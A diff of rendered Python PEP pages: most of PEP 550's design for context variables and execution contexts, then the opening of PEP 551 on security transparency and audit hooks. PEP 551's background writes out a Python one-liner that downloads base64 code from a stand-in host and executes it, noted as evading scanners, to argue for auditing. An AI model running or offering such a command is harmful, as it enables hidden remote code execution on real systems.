For hand-written iterators such an approach to context management is +normally not necessary, and it is easier to set and restore +context variables directly in __next__:

+
class MyIterator:
+
+    # ...
+
+    def __next__(self):
+        old_val = var.get()
+        try:
+            var.set(new_val)
+            # ...
+        finally:
+            var.set(old_val)
+
+
+
+
+
+

Implementation

+

Execution context is implemented as an immutable linked list of +logical contexts, where each logical context is an immutable weak key +mapping. A pointer to the currently active execution context is +stored in the OS thread state:

+
                  +-----------------+
+                  |                 |     ec
+                  |  PyThreadState  +-------------+
+                  |                 |             |
+                  +-----------------+             |
+                                                  |
+ec_node             ec_node             ec_node   v
++------+------+     +------+------+     +------+------+
+| NULL |  lc  |<----| prev |  lc  |<----| prev |  lc  |
++------+--+---+     +------+--+---+     +------+--+---+
+          |                   |                   |
+LC        v         LC        v         LC        v
++-------------+     +-------------+     +-------------+
+| var1: obj1  |     |    EMPTY    |     | var1: obj4  |
+| var2: obj2  |     +-------------+     +-------------+
+| var3: obj3  |
++-------------+
+
+
+

The choice of the immutable list of immutable mappings as a +fundamental data structure is motivated by the need to efficiently +implement contextvars.get_execution_context(), which is to be +frequently used by asynchronous tasks and callbacks. When the EC is +immutable, get_execution_context() can simply copy the current +execution context by reference:

+
def get_execution_context(self):
+    return PyThreadState_Get().ec
+
+
+

Let’s review all possible context modification scenarios:

+
    +
  • The ContextVariable.set() method is called:
    def ContextVar_set(self, val):
    +    # See a more complete set() definition
    +    # in the `Context Variables` section.
    +
    +    tstate = PyThreadState_Get()
    +    top_ec_node = tstate.ec
    +    top_lc = top_ec_node.lc
    +    new_top_lc = top_lc.set(self, val)
    +    tstate.ec = ec_node(
    +        prev=top_ec_node.prev,
    +        lc=new_top_lc)
    +
    +
    +
  • +
  • The contextvars.run_with_logical_context() is called, in which +case the passed logical context object is appended to the execution +context:
    def run_with_logical_context(lc, func, *args, **kwargs):
    +    tstate = PyThreadState_Get()
    +
    +    old_top_ec_node = tstate.ec
    +    new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)
    +
    +    try:
    +        tstate.ec = new_top_ec_node
    +        return func(*args, **kwargs)
    +    finally:
    +        tstate.ec = old_top_ec_node
    +
    +
    +
  • +
  • The contextvars.run_with_execution_context() is called, in which +case the current execution context is set to the passed execution +context with a new empty logical context appended to it:
    def run_with_execution_context(ec, func, *args, **kwargs):
    +    tstate = PyThreadState_Get()
    +
    +    old_top_ec_node = tstate.ec
    +    new_lc = contextvars.LogicalContext()
    +    new_top_ec_node = ec_node(prev=ec, lc=new_lc)
    +
    +    try:
    +        tstate.ec = new_top_ec_node
    +        return func(*args, **kwargs)
    +    finally:
    +        tstate.ec = old_top_ec_node
    +
    +
    +
  • +
  • When genobj.send(), genobj.throw(), or genobj.close() +is called on a genobj generator, the logical +context recorded in genobj is pushed onto the stack:
    PyGen_New(PyGenObject *gen):
    +    if (gen.gi_code.co_flags &
    +            (CO_COROUTINE | CO_ITERABLE_COROUTINE)):
    +        # gen is an 'async def' coroutine, or a generator
    +        # decorated with @types.coroutine.
    +        gen.__logical_context__ = None
    +    else:
    +        # Non-coroutine generator
    +        gen.__logical_context__ = contextvars.LogicalContext()
    +
    +gen_send(PyGenObject *gen, ...):
    +    tstate = PyThreadState_Get()
    +
    +    if gen.__logical_context__ is not None:
    +        old_top_ec_node = tstate.ec
    +        new_top_ec_node = ec_node(
    +            prev=old_top_ec_node,
    +            lc=gen.__logical_context__)
    +
    +        try:
    +            tstate.ec = new_top_ec_node
    +            return _gen_send_impl(gen, ...)
    +        finally:
    +            gen.__logical_context__ = tstate.ec.lc
    +            tstate.ec = old_top_ec_node
    +    else:
    +        return _gen_send_impl(gen, ...)
    +
    +
    +
  • +
  • Coroutines and asynchronous generators share the implementation +with generators, and the above changes apply to them as well.
  • +
+

In certain scenarios the EC may need to be squashed to limit the +size of the chain. For example, consider the following corner case:

+
async def repeat(coro, delay):
+    await coro()
+    await asyncio.sleep(delay)
+    loop.create_task(repeat(coro, delay))
+
+async def ping():
+    print('ping')
+
+loop = asyncio.get_event_loop()
+loop.create_task(repeat(ping, 1))
+loop.run_forever()
+
+
+

In the above code, the EC chain will grow as long as repeat() is +called. Each new task will call +contextvars.run_with_execution_context(), which will append a new +logical context to the chain. To prevent unbounded growth, +contextvars.get_execution_context() checks if the chain +is longer than a predetermined maximum, and if it is, squashes the +chain into a single LC:

+
def get_execution_context():
+    tstate = PyThreadState_Get()
+
+    if tstate.ec_len > EC_LEN_MAX:
+        squashed_lc = contextvars.LogicalContext()
+
+        node = tstate.ec
+        while node:
+            # The LC.merge() method does not replace
+            # existing keys.  (The loop variable is named
+            # `node` so it does not shadow the ec_node
+            # constructor used below.)
+            squashed_lc = squashed_lc.merge(node.lc)
+            node = node.prev
+
+        return ec_node(prev=NULL, lc=squashed_lc)
+    else:
+        return tstate.ec
+
+
+
+

Logical Context

+

Logical context is an immutable weak key mapping which has the +following properties with respect to garbage collection:

+
    +
  • ContextVar objects are strongly-referenced only from the +application code, not from any of the execution context machinery +or values they point to. This means that there are no reference +cycles that could extend their lifespan longer than necessary, or +prevent their collection by the GC.
  • +
  • Values put in the execution context are guaranteed to be kept +alive while there is a ContextVar key referencing them in +the thread.
  • +
  • If a ContextVar is garbage collected, all of its values will +be removed from all contexts, allowing them to be GCed if needed.
  • +
  • If an OS thread has ended its execution, its thread state will be +cleaned up along with its execution context, cleaning +up all values bound to all context variables in the thread.
  • +
+

As discussed earlier, we need contextvars.get_execution_context() +to be consistently fast regardless of the size of the execution +context, so logical context is necessarily an immutable mapping.

+

Choosing dict for the underlying implementation is suboptimal, +because LC.set() will cause dict.copy(), which is an O(N) +operation, where N is the number of items in the LC.

+
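
To make that cost concrete, here is a sketch of what a dict-based +immutable logical context would have to do on every write (for +illustration only; this is not the proposed implementation):

+
def lc_set(lc, var, value):
+    # Immutability via copying: O(N) in the number of items.
+    new_lc = dict(lc)
+    new_lc[var] = value
+    return new_lc
+
+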

get_execution_context(), when squashing the EC, is an O(M) +operation, where M is the total number of context variable values +in the EC.

+

So, instead of dict, we choose Hash Array Mapped Trie (HAMT) +as the underlying implementation of logical contexts. (Scala and +Clojure use HAMT to implement high performance immutable collections +[5], [6].)

+

With HAMT .set() becomes an O(log N) operation, and +get_execution_context() squashing is more efficient on average due +to structural sharing in HAMT.

+

See Appendix: HAMT Performance Analysis for a more elaborate +analysis of HAMT performance compared to dict.

+
+
+

Context Variables

+

The ContextVar.get() and ContextVar.set() methods are +implemented as follows (in pseudo-code):

+
class ContextVar:
+
+    def get(self, *, default=None, topmost=False):
+        tstate = PyThreadState_Get()
+
+        ec_node = tstate.ec
+        while ec_node:
+            if self in ec_node.lc:
+                return ec_node.lc[self]
+            if topmost:
+                break
+            ec_node = ec_node.prev
+
+        return default
+
+    def set(self, value):
+        tstate = PyThreadState_Get()
+        top_ec_node = tstate.ec
+
+        if top_ec_node is not None:
+            top_lc = top_ec_node.lc
+            new_top_lc = top_lc.set(self, value)
+            tstate.ec = ec_node(
+                prev=top_ec_node.prev,
+                lc=new_top_lc)
+        else:
+            # First ContextVar.set() in this OS thread.
+            top_lc = contextvars.LogicalContext()
+            new_top_lc = top_lc.set(self, value)
+            tstate.ec = ec_node(
+                prev=NULL,
+                lc=new_top_lc)
+
+    def delete(self):
+        tstate = PyThreadState_Get()
+        top_ec_node = tstate.ec
+
+        if top_ec_node is None:
+            raise LookupError
+
+        top_lc = top_ec_node.lc
+        if self not in top_lc:
+            raise LookupError
+
+        new_top_lc = top_lc.delete(self)
+
+        tstate.ec = ec_node(
+            prev=top_ec_node.prev,
+            lc=new_top_lc)
+
+
+

For efficient access in performance-sensitive code paths, such as in +numpy and decimal, we cache lookups in ContextVar.get(), +making it an O(1) operation when the cache is hit. The cache key is +composed from the following:

+
    +
  • The new uint64_t PyThreadState->unique_id, which is a globally +unique thread state identifier. It is computed from the new +uint64_t PyInterpreterState->ts_counter, which is incremented +whenever a new thread state is created.
  • +
  • The new uint64_t PyThreadState->stack_version, which is a +thread-specific counter, which is incremented whenever a non-empty +logical context is pushed onto the stack or popped from the stack.
  • +
  • The uint64_t ContextVar->version counter, which is incremented +whenever the context variable value is changed in any logical +context in any OS thread.
  • +
+

The cache is then implemented as follows:

+
class ContextVar:
+
+    def set(self, value):
+        ...  # implementation
+        self.version += 1
+
+    def get(self, *, default=None, topmost=False):
+        if topmost:
+            return self._get_uncached(
+                default=default, topmost=topmost)
+
+        tstate = PyThreadState_Get()
+        if (self.last_tstate_id == tstate.unique_id and
+                self.last_stack_version == tstate.stack_version and
+                self.last_version == self.version):
+            return self.last_value
+
+        value = self._get_uncached(default=default)
+
+        self.last_value = value  # borrowed ref
+        self.last_tstate_id = tstate.unique_id
+        self.last_stack_version = tstate.stack_version
+        self.last_version = self.version
+
+        return value
+
+
+

Note that last_value is a borrowed reference. We assume that +if the version checks are fine, the value object will be alive. +This allows the values of context variables to be properly garbage +collected.

+

This generic caching approach is similar to what the current C +implementation of decimal does to cache the current decimal +context, and has similar performance characteristics.

+
+
+
+

Performance Considerations

+

Tests of the reference implementation based on the prior +revisions of this PEP have shown a 1-2% slowdown on generator +microbenchmarks and no noticeable difference in macrobenchmarks.

+

The performance of non-generator and non-async code is not +affected by this PEP.

+
+
+

Summary of the New APIs

+
+

Python

+

The following new Python APIs are introduced by this PEP +(a combined usage sketch follows the list):

+
    +
  1. The new contextvars.ContextVar(name: str='...') class, +instances of which have the following:
      +
    • the read-only .name attribute,
    • +
    • the .get() method, which returns the value of the variable +in the current execution context;
    • +
    • the .set() method, which sets the value of the variable in +the current logical context;
    • +
    • the .delete() method, which removes the value of the variable +from the current logical context.
    • +
    +
  2. +
  3. The new contextvars.ExecutionContext() class, which represents +an execution context.
  4. +
  5. The new contextvars.LogicalContext() class, which represents +a logical context.
  6. +
  7. The new contextvars.get_execution_context() function, which +returns an ExecutionContext instance representing a copy of +the current execution context.
  8. +
  9. The contextvars.run_with_execution_context(ec: ExecutionContext, +func, *args, **kwargs) function, which runs func with the +provided execution context.
  10. +
  11. The contextvars.run_with_logical_context(lc: LogicalContext, +func, *args, **kwargs) function, which runs func with the +provided logical context on top of the current execution context.
  12. +
+
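
A combined usage sketch of the APIs listed above (a withdrawn +design; Python 3.7 ultimately shipped the simpler PEP 567 API +instead):

+
var = contextvars.ContextVar('var')
+var.set('spam')
+
+# Snapshot the current execution context...
+ec = contextvars.get_execution_context()
+
+def report():
+    return var.get()
+
+# ...and run a callable with that snapshot as its EC.
+assert contextvars.run_with_execution_context(ec, report) == 'spam'
+
+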
+
+

C API

+
    +
  1. PyContextVar * PyContext_NewVar(char *desc): create a +PyContextVar object.
  2. +
  3. PyObject * PyContext_GetValue(PyContextVar *, int topmost): +return the value of the variable in the current execution context.
  4. +
  5. int PyContext_SetValue(PyContextVar *, PyObject *): set +the value of the variable in the current logical context.
  6. +
  7. int PyContext_DelValue(PyContextVar *): delete the value of +the variable from the current logical context.
  8. +
  9. PyLogicalContext * PyLogicalContext_New(): create a new empty +PyLogicalContext.
  10. +
  11. PyExecutionContext * PyExecutionContext_New(): create a new +empty PyExecutionContext.
  12. +
  13. PyExecutionContext * PyExecutionContext_Get(): return the +current execution context.
  14. +
  15. int PyContext_SetCurrent( +PyExecutionContext *, PyLogicalContext *): set the +passed EC object as the current execution context for the active +thread state, and/or set the passed LC object as the current +logical context.
  16. +
+
+
+
+

Design Considerations

+
+

Should “yield from” leak context changes?

+

No. It may be argued that yield from is semantically +equivalent to calling a function, and should leak context changes. +However, it is not possible to satisfy the following at the same time:

+
    +
  • next(gen) does not leak context changes made in gen, and
  • +
  • yield from gen leaks context changes made in gen.
  • +
+

The reason is that yield from can be used with a partially +iterated generator, which already has local context changes:

+
var = contextvars.ContextVar('var')
+
+def gen():
+    for i in range(10):
+        var.set('gen')
+        yield i
+
+def outer_gen():
+    var.set('outer_gen')
+    g = gen()
+
+    yield next(g)
+    # Changes not visible during partial iteration,
+    # the goal of this PEP:
+    assert var.get() == 'outer_gen'
+
+    yield from g
+    assert var.get() == 'outer_gen'  # or 'gen'?
+
+
+

Another example would be refactoring an explicit for..in yield +construct into a yield from expression. Consider the following +code:

+
def outer_gen():
+    var.set('outer_gen')
+
+    for i in gen():
+        yield i
+    assert var.get() == 'outer_gen'
+
+
+

which we want to refactor to use yield from:

+
def outer_gen():
+    var.set('outer_gen')
+
+    yield from gen()
+    assert var.get() == 'outer_gen'  # or 'gen'?
+
+
+

The above examples illustrate that it is unsafe to refactor +generator code using yield from when it can leak context changes.

+

Thus, the only well-defined and consistent behaviour is to +always isolate context changes in generators, regardless of +how they are being iterated.

+
+
+

Should PyThreadState_GetDict() use the execution context?

+

No. PyThreadState_GetDict is based on TLS, and changing its +semantics will break backwards compatibility.

+
+
+

PEP 521

+

PEP 521 proposes an alternative solution to the problem, which +extends the context manager protocol with two new methods: +__suspend__() and __resume__(). Similarly, the asynchronous +context manager protocol is also extended with __asuspend__() and +__aresume__().

+

This allows implementing context managers that manage non-local state, +which behave correctly in generators and coroutines.

+

For example, consider the following context manager, which uses +a context variable:

+
class Context:
+
+    def __init__(self):
+        self.var = contextvars.ContextVar('var')
+
+    def __enter__(self):
+        self.old_x = self.var.get()
+        self.var.set('something')
+
+    def __exit__(self, *err):
+        self.var.set(self.old_x)
+
+
+

An equivalent implementation with PEP 521:

+
local = threading.local()
+
+class Context:
+
+    def __enter__(self):
+        self.old_x = getattr(local, 'x', None)
+        local.x = 'something'
+
+    def __suspend__(self):
+        local.x = self.old_x
+
+    def __resume__(self):
+        local.x = 'something'
+
+    def __exit__(self, *err):
+        local.x = self.old_x
+
+
+

The downside of this approach is the addition of significant new +complexity to the context manager protocol and the interpreter +implementation. This approach is also likely to negatively impact +the performance of generators and coroutines.

+

Additionally, the solution in PEP 521 is limited to context +managers, and does not provide any mechanism to propagate state in +asynchronous tasks and callbacks.

+
+
+

Can Execution Context be implemented without modifying CPython?

+

No.

+

It is true that the concept of “task-locals” can be implemented +for coroutines in libraries (see, for example, [29] and [30]). +On the other hand, generators are managed by the Python interpreter +directly, and so their context must also be managed by the +interpreter.

+

Furthermore, the execution context cannot be implemented in a third-party +module at all; otherwise the standard library, including decimal, +would not be able to rely on it.

+
+
+

Should we update sys.displayhook and other APIs to use EC?

+

APIs like redirecting stdout by overwriting sys.stdout, or +specifying new exception display hooks by overwriting the +sys.displayhook function, affect the whole Python process +by design. Their users assume that the effect of changing +them will be visible across OS threads. Therefore, we cannot +simply make these APIs use the new Execution Context.

+

That said, we think it is possible to design new APIs that will +be context aware, but that is outside the scope of this PEP.

+
+
+

Greenlets

+

Greenlet is an alternative implementation of cooperative +scheduling for Python. Although the greenlet package is not part of +CPython, popular frameworks like gevent rely on it, and it is +important that greenlet can be modified to support execution +contexts.

+

Conceptually, the behaviour of greenlets is very similar to that of +generators, which means that similar changes around greenlet entry +and exit can be made to add support for execution context. This +PEP provides the necessary C APIs to do that.

+
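
A hypothetical Python-level sketch of such an integration (the +class name and wiring are invented for illustration):

+
class ContextAwareGreenlet:
+    # Each greenlet gets its own logical context, pushed on entry
+    # and popped on exit, mirroring the generator behaviour.
+    def __init__(self, func):
+        self._lc = contextvars.LogicalContext()
+        self._func = func
+
+    def run(self, *args):
+        return contextvars.run_with_logical_context(
+            self._lc, self._func, *args)
+
+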
+
+

Context manager as the interface for modifications

+

This PEP concentrates on the low-level mechanics and the minimal +API that enables fundamental operations with execution context.

+

For developer convenience, a high-level context manager interface +may be added to the contextvars module. For example:

+
with contextvars.set_var(var, 'foo'):
+    # ...
+
+
+
+
+

Setting and restoring context variables

+

The ContextVar.delete() method removes the context variable from +the topmost logical context.

+

If the variable is not found in the topmost logical context, a +LookupError is raised, similarly to del var raising +NameError when var is not in scope.

+

This method is useful when there is a (rare) need to correctly restore +the state of a logical context, such as when a nested generator +wants to modify the logical context temporarily:

+
var = contextvars.ContextVar('var')
+
+def gen():
+    with some_var_context_manager('gen'):
+        # EC = [{var: 'main'}, {var: 'gen'}]
+        assert var.get() == 'gen'
+        yield
+
+    # EC = [{var: 'main modified'}, {}]
+    assert var.get() == 'main modified'
+    yield
+
+def main():
+    var.set('main')
+    g = gen()
+    next(g)
+    var.set('main modified')
+    next(g)
+
+
+

The above example would work correctly only if there is a way to +delete var from the logical context in gen(). Setting it +to a “previous value” in __exit__() would mask changes made +in main() between the iterations.

+
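
A hedged sketch of some_var_context_manager from the example +above, restoring state with delete() (this assumes var was not +already set in the generator's own topmost logical context):

+
import contextlib
+
+@contextlib.contextmanager
+def some_var_context_manager(value):
+    var.set(value)
+    try:
+        yield
+    finally:
+        # Remove var from the topmost LC instead of re-setting it,
+        # so outer modifications remain visible afterwards.
+        var.delete()
+
+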
+
+

Alternative Designs for ContextVar API

+
+

Logical Context with stacked values

+

By the design presented in this PEP, logical context is a simple +LC({ContextVar: value, ...}) mapping. An alternative +representation is to store a stack of values for each context +variable: LC({ContextVar: [val1, val2, ...], ...}).

+

The ContextVar methods would then be:

+
    +
  • get(*, default=None) – traverses the stack +of logical contexts, and returns the top value from the +first non-empty logical context;
  • +
  • push(val) – pushes val onto the stack of values in the +current logical context;
  • +
  • pop() – pops the top value from the stack of values in +the current logical context.
  • +
+

Compared to the single-value design with the set() and +delete() methods, the stack-based approach allows for a simpler +implementation of the set/restore pattern. However, the mental +burden of this approach is considered to be higher, since there +would be two stacks to consider: a stack of LCs and a stack of +values in each LC.

+

(This idea was suggested by Nathaniel Smith.)

+
+
+

ContextVar “set/reset”

+

Yet another approach is to return a special object from +ContextVar.set(), which would represent the modification of +the context variable in the current logical context:

+
var = contextvars.ContextVar('var')
+
+def foo():
+    mod = var.set('spam')
+
+    # ... perform work
+
+    mod.reset()  # Reset the value of var to the original value
+                 # or remove it from the context.
+
+
+

The critical flaw in this approach is that it becomes possible to +pass context var “modification objects” into code running in a +different execution context, which leads to undefined side effects.

+
+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+
+
+

Rejected Ideas

+
+

Replication of threading.local() interface

+

Choosing the threading.local()-like interface for context +variables was considered and rejected for the following reasons:

+
    +
  • A survey of the standard library and Django has shown that the +vast majority of threading.local() uses involve a single +attribute, which indicates that the namespace approach is not +as helpful in the field.
  • +
  • Using __getattr__() instead of .get() for value lookup +does not provide any way to specify the depth of the lookup +(i.e. search only the top logical context).
  • +
  • Single-value ContextVar is easier to reason about in terms +of visibility. Suppose ContextVar() is a namespace, +and consider the following:
    ns = contextvars.ContextVar('ns')
    +
    +def gen():
    +    ns.a = 2
    +    yield
    +    assert ns.b == 'bar' # ??
    +
    +def main():
    +    ns.a = 1
    +    ns.b = 'foo'
    +    g = gen()
    +    next(g)
    +    # should not see the ns.a modification in gen()
    +    assert ns.a == 1
    +    # but should gen() see the ns.b modification made here?
    +    ns.b = 'bar'
+    next(g)  # resume gen() so it reaches its second assert
    +
    +
    +

    The above example demonstrates that reasoning about the visibility +of different attributes of the same context var is not trivial.

    +
  • +
  • Single-value ContextVar allows straightforward implementation +of the lookup cache;
  • +
  • Single-value ContextVar interface allows the C-API to be +simple and essentially the same as the Python API.
  • +
+

See also the mailing list discussion: [26], [27].

+
+
+

Coroutines not leaking context changes by default

+

In V4 (Version History) of this PEP, coroutines were considered to +behave exactly like generators with respect to the execution context: +changes in awaited coroutines were not visible in the outer coroutine.

+

This idea was rejected on the grounds that it breaks the semantic +similarity of the task and thread models and, more specifically, +makes it impossible to reliably implement asynchronous context +managers that modify context vars, since __aenter__ is a +coroutine.

+
+
+
+

Appendix: HAMT Performance Analysis

+
+../_images/pep-0550-hamt_vs_dict-v2.png + +
+

Figure 1. Benchmark code can be found here: [9].

+
+
+

The above chart demonstrates that:

+
    +
  • HAMT displays near O(1) performance for all benchmarked +dictionary sizes.
  • +
  • dict.copy() becomes very slow around 100 items.
  • +
+
+../_images/pep-0550-lookup_hamt.png + +
+

Figure 2. Benchmark code can be found here: [10].

+
+
+

Figure 2 compares the lookup costs of dict versus a HAMT-based +immutable mapping. HAMT lookup time is 30-40% slower than Python dict +lookups on average, which is a very good result, considering that the +latter is very well optimized.

+

There is research [8] showing that there are further possible +improvements to the performance of HAMT.

+

The reference implementation of HAMT for CPython can be found here: +[7].

+
+
+

Acknowledgments

+

Thanks to Victor Petrovykh for countless discussions around the topic +and PEP proofreading and edits.

+

Thanks to Nathaniel Smith for proposing the ContextVar design +[17] [18], for pushing the PEP towards a more complete design, and +coming up with the idea of having a stack of contexts in the thread +state.

+

Thanks to Alyssa (Nick) Coghlan for numerous suggestions and ideas on the +mailing list, and for coming up with a case that caused the complete +rewrite of the initial PEP version [19].

+
+
+

Version History

+
    +
  1. Initial revision, posted on 11-Aug-2017 [20].
  2. +
  3. V2 posted on 15-Aug-2017 [21].

    The fundamental limitation that caused a complete redesign of the +first version was that it was not possible to implement an iterator +that would interact with the EC in the same way as generators +(see [19].)

    +

    Version 2 was a complete rewrite, introducing new terminology +(Local Context, Execution Context, Context Item) and new APIs.

    +
  4. +
  5. V3 posted on 18-Aug-2017 [22].

    Updates:

    +
      +
    • Local Context was renamed to Logical Context. The term “local” +was ambiguous and conflicted with local name scopes.
    • +
    • Context Item was renamed to Context Key, see the thread with Alyssa +Coghlan, Stefan Krah, and Yury Selivanov [23] for details.
    • +
    • Context Item get cache design was adjusted, per Nathaniel Smith’s +idea in [25].
    • +
    • Coroutines are created without a Logical Context; ceval loop +no longer needs to special case the await expression +(proposed by Alyssa Coghlan in [24].)
    • +
    +
  6. +
  7. V4 posted on 25-Aug-2017 [31].
      +
    • The specification section has been completely rewritten.
    • +
    • Coroutines now have their own Logical Context. This means +there is no difference between coroutines, generators, and +asynchronous generators w.r.t. interaction with the Execution +Context.
    • +
    • Context Key renamed to Context Var.
    • +
    • Removed the distinction between generators and coroutines with +respect to logical context isolation.
    • +
    +
  8. +
  9. V5 posted on 01-Sep-2017: the current version. +
  10. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0550.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0551/index.html b/pep-0551/index.html new file mode 100644 index 00000000000..45e0b944032 --- /dev/null +++ b/pep-0551/index.html @@ -0,0 +1,602 @@ + + + + + + + + PEP 551 – Security transparency in the Python runtime | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 551 – Security transparency in the Python runtime

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
23-Aug-2017
+
Python-Version:
+
3.7
+
Post-History:
+
24-Aug-2017, 28-Aug-2017
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been withdrawn. For information about integrating +CPython into a secure environment, we recommend consulting your own +security experts.

+
+
+

Relationship to PEP 578

+

This PEP has been split into two since its original posting.

+

See PEP 578 for the +auditing APIs proposed for addition to the next version of Python.

+

This is now an informational PEP, providing guidance to those planning +to integrate Python into their secure or audited environments.

+
+
+

Abstract

+

This PEP describes the concept of security transparency and how it +applies to the Python runtime. Visibility into actions taken by the +runtime is invaluable in integrating Python into an otherwise secure +and/or monitored environment.

+

The audit hooks described in PEP 578 are an essential component in +detecting, identifying and analyzing misuse of Python. While the hooks +themselves are neutral (in that not every reported event is inherently +misuse), they provide essential context to those who are responsible +for monitoring an overall system or network. With enough transparency, +attackers are no longer able to hide.

+
+
+

Background

+

Software vulnerabilities are generally seen as bugs that enable remote +or elevated code execution. However, in our modern connected world, the +more dangerous vulnerabilities are those that enable advanced persistent +threats (APTs). APTs are achieved when an attacker is able to penetrate +a network, establish their software on one or more machines, and over +time extract data or intelligence. Some APTs may make themselves known +by maliciously damaging data (e.g., WannaCrypt) +or hardware (e.g., Stuxnet). +Most attempt to hide their existence and avoid detection. APTs often use +a combination of traditional vulnerabilities, social engineering, +phishing (or spear-phishing), thorough network analysis, and an +understanding of misconfigured environments to establish themselves and +do their work.

+

The first infected machines may not be the final target and may not +require special privileges. For example, an APT that is established as a +non-administrative user on a developer’s machine may have the ability to +spread to production machines through normal deployment channels. It is +common for APTs to persist on as many machines as possible, with sheer +weight of presence making them difficult to remove completely.

+

Whether an attacker is seeking to cause direct harm or hide their +tracks, the biggest barrier to detection is a lack of insight. System +administrators with large networks rely on distributed logs to +understand what their machines are doing, but logs are often filtered to +show only error conditions. APTs that are attempting to avoid detection +will rarely generate errors or abnormal events. Reviewing normal +operation logs involves a significant amount of effort, though work is +underway by a number of companies to enable automatic anomaly detection +within operational logs. The tools preferred by attackers are ones that +are already installed on the target machines, since log messages from +these tools are often expected and ignored in normal use.

+

At this point, we are not going to spend further time discussing the +existence of APTs or methods and mitigations that do not apply to this +PEP. For further information about the field, we recommend reading or +watching the resources listed under Further Reading.

+

Python is a particularly interesting tool for attackers due to its +prevalence on server and developer machines, its ability to execute +arbitrary code provided as data (as opposed to native binaries), and its +complete lack of internal auditing. This allows attackers to download, +decrypt, and execute malicious code with a single command:

+
python -c "import urllib.request, base64;
+    exec(base64.b64decode(
+        urllib.request.urlopen('http://my-exploit/py.b64')
+    ).decode())"
+
+
+

This command currently bypasses most anti-malware scanners that rely on +recognizable code being read through a network connection or being +written to disk (base64 is often sufficient to bypass these checks). It +also bypasses protections such as file access control lists or +permissions (no file access occurs), approved application lists +(assuming Python has been approved for other uses), and automated +auditing or logging (assuming Python is allowed to access the internet +or access another machine on the local network from which to obtain its +payload).

+

General consensus among the security community is that totally +preventing attacks is infeasible and defenders should assume that they +will often detect attacks only after they have succeeded. This is known +as the “assume breach” mindset. [1] In this scenario, protections such +as sandboxing and input validation have already failed, and the +important task is detection, tracking, and eventual removal of the +malicious code. To this end, the primary feature required from Python is +security transparency: the ability to see what operations the Python +runtime is performing that may indicate anomalous or malicious use. +Preventing such use is valuable, but secondary to the need to know that +it is occurring.

+

To summarise the goals in order of increasing importance:

+
    +
  • preventing malicious use is valuable
  • +
  • detecting malicious use is important
  • +
  • detecting attempts to bypass detection is critical
  • +
+

One example of a scripting engine that has addressed these challenges is +PowerShell, which has recently been enhanced towards similar goals of +transparency and prevention. [2]

+

Generally, application and system configuration will determine which events within a scripting engine are worth logging. However, given that the value of many log events is not recognized until after an attack is detected, it is important to capture as much as possible and to filter views rather than filtering at the source (see the No Easy Breach video from Further Reading). Events that are always of interest include attempts to bypass auditing, attempts to load and execute code that is not correctly signed or access-controlled, use of uncommon operating system functionality such as debugging or inter-process inspection tools, most network access and DNS resolution, and attempts to create and hide files or configuration settings on the local machine.

+

To summarize, defenders have a need to audit specific uses of Python in +order to detect abnormal or malicious usage. With PEP 578, the Python +runtime gains the ability to provide this. The aim of this PEP is to +assist system administrators with deploying a security transparent +version of Python that can integrate with their existing auditing and +protection systems.

+

On Windows, some specific features that may be integrated through the +hooks added by PEP 578 include:

+
    +
  • Script Block Logging [3]
  • +
  • DeviceGuard [4]
  • +
  • AMSI [5]
  • +
  • Persistent Zone Identifiers [6]
  • +
  • Event tracing (which includes event forwarding) [7]
  • +
+

On Linux, some specific features that may be integrated are:

+
    +
  • gnupg [8]
  • +
  • sd_journal [9]
  • +
  • OpenBSM [10]
  • +
  • syslog [11]
  • +
  • auditd [12]
  • +
  • SELinux labels [13]
  • +
  • check execute bit on imported modules
  • +
+

On macOS, some features that may be integrated are:

+ +

Overall, the ability to enable these platform-specific features on +production machines is highly appealing to system administrators and +will make Python a more trustworthy dependency for application +developers.

+

True security transparency is not fully achievable by Python in +isolation. The runtime can audit as many events as it likes, but unless +the logs are reviewed and analyzed there is no value. Python may impose +restrictions in the name of security, but usability may suffer. +Different platforms and environments will require different +implementations of certain security features, and organizations with the +resources to fully customize their runtime should be encouraged to do +so.

+
+
+

Summary Recommendations

+

These are discussed in greater detail in later sections, but are +presented here to frame the overall discussion.

+

Sysadmins should provide and use an alternate entry point (besides +python.exe or pythonX.Y) in order to reduce surface area and +securely enable audit hooks. A discussion of what could be restricted +is below in Restricting the Entry Point.

+

Sysadmins should use all available measures provided by their operating +system to prevent modifications to their Python installation, such as +file permissions, access control lists and signature validation.

+

Sysadmins should log everything and collect logs to a central location +as quickly as possible - avoid keeping logs on outer-ring machines.

+

Sysadmins should prioritize detection of misuse over prevention of misuse.

+
+
+

Restricting the Entry Point

+

One of the primary vulnerabilities exposed by the presence of Python +on a machine is the ability to execute arbitrary code without +detection or verification by the system. This is made significantly +easier because the default entry point (python.exe on Windows and +pythonX.Y on other platforms) allows execution from the command +line, from standard input, and does not have any hooks enabled by +default.

+

Our recommendation is that production machines should use a modified +entry point instead of the default. Once outside of the development +environment, there is rarely a need for the flexibility offered by the +default entry point.

+

In this section, we describe a hypothetical spython entry point +(spython.exe on Windows; spythonX.Y on other platforms) that +provides a level of security transparency recommended for production +machines. An associated example implementation shows many of the +features described here, though with a number of concessions for the +sake of avoiding platform-specific code. A sufficient implementation +will inherently require some integration with platform-specific +security features.

+

Official distributions will not include any spython by default, but +third party distributions may include appropriately modified entry +points that use the same name.

+

Remove most command-line arguments

+

The spython entry point requires a script file be passed as the first argument, and does not allow any options to precede it. This prevents arbitrary code execution from in-memory data or non-script files (such as pickles, which could be executed using -m pickle <path>).

+

Options -B (do not write bytecode), -E (ignore environment +variables) and -s (no user site) are assumed.

+

If a file with the same full path as the process with a ._pth suffix +(spython._pth on Windows, spythonX.Y._pth on Linux) exists, it +will be used to initialize sys.path following the rules currently +described for Windows.
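For illustration, a hypothetical spython._pth placed next to the binary might pin the search path to vetted locations only (a sketch following the Windows ._pth format, one path entry per line; the paths here are placeholders):

# hypothetical spython._pth; each non-comment line becomes a sys.path entry
+/opt/app/lib
+/opt/app/site-packages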

+

